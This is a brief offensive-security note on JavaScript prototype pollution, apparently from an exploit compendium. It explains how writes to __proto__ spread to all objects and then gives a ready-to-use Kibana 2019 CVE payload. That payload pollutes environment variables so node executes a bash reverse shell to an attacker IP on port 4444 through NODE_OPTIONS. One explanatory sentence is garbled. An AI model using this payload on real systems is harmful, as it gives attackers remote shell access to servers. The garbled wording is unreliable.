killchain-compendium/Exploits/Web/Prototype Pollution JS.md

Prototype Pollution

Overwrite built in properties, like constructor, toString of an object.

Any other instance inherits properties from Object.__proto__. toString() is inherited by all objects. That means if the toString() functions is overwritten it is changed in all other objects as well.

Usage

Access to prototype can be gained inside an object, as an example

obj.__proto__
Object.prototype

Create an object

let obj = {}

Create properties inside __proto__.

obj.__proto__.isAdmin = true

Kibana CVE 2019

A concrete example is a Kibana prototype pollution from CVE from 2019. Write reverse bash into variables so they get Therefore Use the following node functions

• require
• eval

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')